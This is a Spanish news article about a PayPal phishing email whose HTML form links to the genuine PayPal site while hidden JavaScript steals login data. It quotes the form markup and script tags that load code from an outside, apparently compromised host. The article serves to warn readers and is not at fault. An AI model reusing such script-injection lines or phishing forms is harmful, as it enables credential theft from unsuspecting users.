Seguridad

Comprobar las URL’s ya no nos librará de ser víctimas del phishing

paypal-phishing
Escrito por Marcos Merino

Una nueva técnica permite que un formulario enviado por e-mail redirija al sitio legítimo de Paypal al tiempo que roba datos privados usando Javascript.

El phishing sigue siendo hoy, 20 años después de la aparición del término, una técnica muy rentable para los cibercriminales, basada en la adquisición fraudulenta de información confidencial del usuario a través de la suplantación de la identidad de una persona o empresa de confianza (habitualmente administraciones públicas, instituciones financieras y sitios de comercio electrónico).

Hasta ahora, el sistema más eficaz para prevenir ser víctima de un ataque de phising era comprobar los enlaces de los correos electrónicos para comprobar que remitían a las webs legítimas vinculadas a la marca supuestamente remitente del mensaje. Sin embargo, la inventiva de los ‘phishers’ ha logrado que, a partir de ahora, esa comprobación deje de ser una garantía para evitar ser víctima del phishing.

Según desvela el sitio web ‘My Online Security’, están circulando e-mails que constituyen un ataque de phishing… pese a que el código HTML remite en todo momento al sitio legítimo de PayPal: “Parecía el típico e-mail fraudulento creado mediante alguno de los kits de phishing, con un estándar de correo electrónico con un archivo adjunto formulario HTML. Bien, nada raro o diferente, excepto todos los vínculos obvios en el código HTML ir a sitios de PayPal auténticos. Los estafadores están utilizando un método de JavaScript oculto redirigir para robar los datos [de login], mientras que el botón de enviar aún muestra como ir a PayPal.com“.

Así es el código del formulario:

<form class="safeSubmit multiplesubmitform" method="post" id="signup_form" name="signup_form" action="https://www.paypal.com/il/cgi-bin/webscr?SESSION=F5sJMNm-og4yRrDzVrFsSwS4Pjt6Wq1x-aFmISUJZy7xVTNjFu8OmrGhb-4&amp;dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33"><fieldset class="error"><legend class="accessAid">SignUp Form</legend>

pero éstos son los scripts y las hojas de estilo añadidas en el código:

<link rel=”stylesheet” href=”http://www.egypt-trips.co/wp-admin/includes/New/css/default.css” />
<script type=”text/javascript” src=”http://www.egypt-trips.co/wp-admin/includes/New/js/jquery.ba-hashchange.min.js“></script>
<script type=”text/javascript” src=”http://www.egypt-trips.co/wp-admin/includes/New/js/default.js“></script>

El autor del post reconoce que “una vez que un estafador pone este [formulario] en un sitio web con una dirección URL verosímil, todas las alarmas estarán apagadas y será casi imposible detectar el phishing. Esto es muy preocupante”.

Sobre el autor de este artículo

Marcos Merino

Marcos Merino es redactor freelance y consultor de marketing 2.0. Autodidacta, con experiencia en medios (prensa escrita y radio), y responsable de comunicación online en organizaciones sin ánimo de lucro.